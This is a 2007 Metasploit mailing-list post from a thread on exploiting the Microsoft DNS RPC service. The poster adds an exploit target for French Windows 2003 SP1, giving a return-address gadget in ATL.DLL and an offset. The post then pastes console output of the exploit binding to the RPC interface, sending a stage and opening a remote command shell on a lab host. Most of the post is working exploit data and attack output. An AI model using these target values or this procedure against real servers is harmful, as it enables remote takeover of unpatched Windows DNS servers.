Metasploit mailing list archives
Exploiting the Microsoft DNS RPC service
From: fab at revhosts.net (Fabrice MOURRON)
Date: Thu, 19 Apr 2007 01:18:53 +0200
Hi, For a Win2003 SP1 french target : # ATL.DLL # 76a31a60 5b pop ebx # 76a31a61 5d pop ebp # 76a31a62 c3 ret [ 'Windows 2003 Server SP1 French', { 'Off' => 1633, 'Ret' => 0x76a31a60} ], [*] Trying target Windows 2000 SP0-SP4 / Windows 2003 SP0-SP2 English/ French... [*] Binding to 50abc2a4-574d-40b3-9d66-ee4fd5fba076:5.0 at ncacn_ip_tcp: 192.168.0.200[0] ... [*] Bound to 50abc2a4-574d-40b3-9d66-ee4fd5fba076:5.0 at ncacn_ip_tcp: 192.168.0.200[0] ... [*] Sending exploit... [*] Sending stage (474 bytes) [*] Error: no response from dcerpc service [*] Command shell session 3 opened (192.168.0.2:57601 -> 192.168.0.200:4444) Microsoft Windows [version 5.2.3790] (C) Copyright 1985-2003 Microsoft Corp. C:\WINDOWS\system32>ipconfig /all ipconfig /all Configuration IP de Windows Nom de l'h?te . . . . . . . . . . : win2003fr Suffixe DNS principal . . . . . . : msf.local Type de n?ud . . . . . . . . . . : Inconnu Routage IP activ? . . . . . . . . : Non Proxy WINS activ? . . . . . . . . : Non Liste de recherche du suffixe DNS.: msf.local Carte Ethernet Connexion au r?seau local : Suffixe DNS propre ? la connexion : Description . . . . . . . . . . . : VMware Accelerated AMD PCNet Adapter Adresse physique . . . . . . . . . : 00-0C-29-90-40-C2 DHCP activ?. . . . . . . . . . . . : Non Adresse IP. . . . . . . . .?. . . : 192.168.0.200 Masque de sous-r?seau . . .?. . . : 255.255.255.0 Passerelle par d?faut . . .?. . . : 192.168.0.254 Serveurs DNS . . . . . . . . . . : 127.0.0.1 French target for Win2003 SP2 coming soon. @+ Fab
Current thread:
- Exploiting the Microsoft DNS RPC service H D Moore (Apr 15)
- Exploiting the Microsoft DNS RPC service Giorgio Casali (Apr 17)
- Exploiting the Microsoft DNS RPC service diaul (Apr 18)
- Exploiting the Microsoft DNS RPC service Fabrice MOURRON (Apr 18)
- Exploiting the Microsoft DNS RPC service fab at revhosts.net (Apr 19)
- Exploiting the Microsoft DNS RPC service Fabien Perigaud (Apr 19)
- Exploiting the Microsoft DNS RPC service diaul (Apr 18)
- Exploiting the Microsoft DNS RPC service Giorgio Casali (Apr 17)